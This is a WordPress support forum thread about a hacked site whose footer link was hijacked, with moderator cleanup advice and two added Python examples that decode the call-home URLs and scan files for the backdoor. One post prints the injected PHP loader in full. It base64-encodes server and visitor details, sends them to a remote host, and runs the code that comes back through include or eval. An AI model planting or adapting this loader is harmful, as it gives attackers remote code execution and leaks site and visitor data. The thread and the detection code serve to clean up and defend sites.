• One of my friend’s footer links got hacked. His Powered by WordPress link points to a different URL instead of wordpress.org. I searched for exploits in his WordPress theme files and found that the hacker used this code to call the hacked URL.

    <?=@get_wp_results('f');?>

    I can’t find the injected code!! Where is it, in the database or somewhere else? Need help, guys… I am just a newb…

Viewing 15 replies - 1 through 15 (of 15 total)
  • Thread Starter koydin

    (@koydin)

    Any updates..??

    Hi,

    Refer to this article:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    Thanks,

    Shane G.

    Some theme authors change the URLs to point to their theme website. Is it a customised theme?

    Thread Starter koydin

    (@koydin)

    It’s a customized theme. It was pointing to wordpress.org before the hack. I searched through the internet and found the hacker injected some .php file with this code:

    <? error_reporting(0);
    $s="e";
    $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
    if((include(base64_decode("...").base64_decode("...")."/?".$str)));
    else if(include(base64_decode("...").base64_decode("...")."/?".$str));
    else if($c=file_get_contents(base64_decode("...").$str))eval($c);
    else{$cu=curl_init(base64_decode("...").$str);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $str=curl_exec($cu);
    curl_close($cu);
    eval($str);
    }; ?>

    I deleted all the files. But his Powered by WordPress link points to a different URL instead of wordpress.org. I think the hacker injected something in the database.
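
Added example, not part of the original post: the `$str` value in the code above is ten base64 fields joined by dots, with the literal `e` in ninth place, so a request URL captured in an outbound proxy or firewall log can be decoded to see which site and entry script made the call. The log line layout, the `collector.invalid` host and all sample values are constructed, and having such a log is an assumption.

```python
import base64

# Field order copied from the $str concatenation in the posted code: ten
# base64 values, with the literal marker $s = "e" inserted at position 8.
FIELDS = ("HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF", "QUERY_STRING",
          "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR",
          "SCRIPT_FILENAME", "HTTP_ACCEPT_LANGUAGE")


def decode_callhome(url_or_query):
    """Return the decoded fields, or None if the string does not fit the format."""
    parts = url_or_query.split("?", 1)[-1].split(".")
    if len(parts) != 11 or parts[8] != "e":
        return None
    try:
        # validate=True rejects characters outside the base64 alphabet
        raw = [base64.b64decode(p, validate=True) for p in parts[:8] + parts[9:]]
    except ValueError:
        return None
    return {name: v.decode("utf-8", "replace") for name, v in zip(FIELDS, raw)}


def affected_sites(log_lines):
    """List (HTTP_HOST, SCRIPT_FILENAME) for every call-home URL in the lines."""
    seen = set()
    for line in log_lines:
        for token in line.split():
            fields = decode_callhome(token)
            if fields:
                seen.add((fields["HTTP_HOST"], fields["SCRIPT_FILENAME"]))
    return sorted(seen)


def make_sample(values):
    """Encode ten constructed values the way the posted $str line does."""
    enc = [base64.b64encode(v.encode()).decode() for v in values]
    return ".".join(enc[:8] + ["e"] + enc[8:])


if __name__ == "__main__":
    # Constructed sample: every host, path and address here is made up.
    q = make_sample(["blog.example", "blog.example", "/", "/index.php", "", "",
                     "Mozilla/5.0", "203.0.113.7", "/home/user/public_html/index.php", "en"])
    print(affected_sites(["GET http://collector.invalid/?" + q + " 200",
                          "GET http://wordpress.org/?v=1.2.3 200"]))
```

`SCRIPT_FILENAME` is the entry script PHP was running, not necessarily the file that holds the injected code, so on a shared account it narrows the search to an install rather than to a single file.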

    Thread Starter koydin

    (@koydin)

    Anyone.. out there??? To help me out…

    Thread Starter koydin

    (@koydin)

    I found some base64 code in wp-admin.. also some new file names. I deleted those files. But no code in the database. Is there any way I can find that..??

    Koydin, your server would have to be badly misconfigured for those hacks to run in the first place, since there is no <?php tag in the code. If I were you, I’d start from scratch with a new server environment and a new copy of all the WordPress files.

    Koydin, have you checked out this thread ~ http://wordpress.org/support/topic/370546 ~ it might be simply a matter of removing/editing the affected files from the backdoor ~ http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    and most of these are likely related to the same problem you may have ~ http://wordpress.org/tags/base64

    dassad

    (@dassad)

    Koydin, can you help me out with this virus? I got hacked like you, but I haven’t found the virus until now. Can you send me the code that you found or some help? Thank you. And please hurry, while all my blogs are hacked at this time on that hostgator server.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Can you send me the code that you found or some help.

    You’ve got a lot of work ahead of you. Here are the boilerplate links for delousing your hacked blog.

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    RVoodoo has written up his experience too.

    http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

    Once you’ve cleaned out your installation, harden it to stop (or at least slow down) this from happening again.

    http://codex.wordpress.org/Hardening_WordPress

    Good luck.

    dassad

    (@dassad)

    My problem is that I found the <?=@get_wp_results('f');?> code only in my footer, but I didn’t find anything until now. And it is changing my links, but my footer doesn’t show up. For example http://7don.com

    dassad

    (@dassad)

    So I need to find a modified file or something so I can start to hunt it down. But nothing until now. I searched in my database, I downloaded my whole website, and am searching for “eval”, “base64” and these types of code in them.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Sorry, but every file in your installation is suspect, as well as your database. That’s what it means to be hacked.

    If you want to fix it then you need to replace every file you can with the freshly downloaded original files, hunt through any files you have left, and scour your database.

    Anything less than that won’t find it. Once you have found it, then you need to close the door that the attacker came in through.

    It’s a metric ton of work but that’s what is needed. Once again, good luck. The work is outlined in those links.
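
Added example, not part of the original replies: one way to do the "hunt through any files you have left" step for the specific code quoted in this thread, scanning every file for a `get_wp_results` call or definition, an `include` of a `base64_decode` result, and a remote fetch followed by `eval`. The sample tree and its file names are constructed, and the rule set covers only the patterns shown on this page.

```python
import re
import tempfile
from pathlib import Path

# Indicators from the code quoted in this thread; PHP names ignore case.
RULES = [
    ("get_wp_results call", re.compile(rb"(function\s+)?get_wp_results\s*\(", re.I)),
    ("include of base64-decoded target", re.compile(
        rb"\b(?:include|require)(?:_once)?\s*\(?\s*base64_decode\s*\(", re.I)),
    ("remote fetch followed by eval", re.compile(
        rb"\b(?:file_get_contents|curl_exec)\s*\(.{0,300}?\beval\s*\(", re.I | re.S)),
]


def scan_bytes(data):
    """Return sorted (line, finding) pairs for one file's raw contents."""
    hits = []
    for label, rx in RULES:
        for m in rx.finditer(data):
            # Only the first rule has a group; it is set for "function ...".
            what = "get_wp_results definition" if m.lastindex else label
            hits.append((data.count(b"\n", 0, m.start()) + 1, what))
    return sorted(hits)


def scan_tree(root):
    """Scan every file under root, whatever its extension."""
    report = []
    for path in Path(root).rglob("*"):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            report += [(rel, n, what) for n, what in scan_bytes(path.read_bytes())]
    return sorted(report)


# Constructed mini-install for the demo; the file names are made up.
SAMPLE = {
    "wp-content/themes/custom/footer.php": b"<p>\n<?=@get_wp_results('f');?>\n</p>\n",
    "wp-admin/js/cache.php": b"<?\nfunction get_wp_results($k){\n$s=curl_exec($cu);\neval($s);}\n",
    "index.php": b"<?php require('./wp-blog-header.php');\n",
}

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        for hit in scan_tree(tmp):
            print(*hit)
```

A clean result only means these particular strings are absent; the file replacement and database check described above are still needed.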

    dassad

    (@dassad)

    Yeah, I understand that, but until I find the modified files I don’t want to replace anything. I have now removed the injected code from the footers and I’m waiting to see if it will appear again, however. I still have the virus in my sites. If it’s not only injected somehow.

  • The topic ‘WordPress Link got Hacked’ is closed to new replies.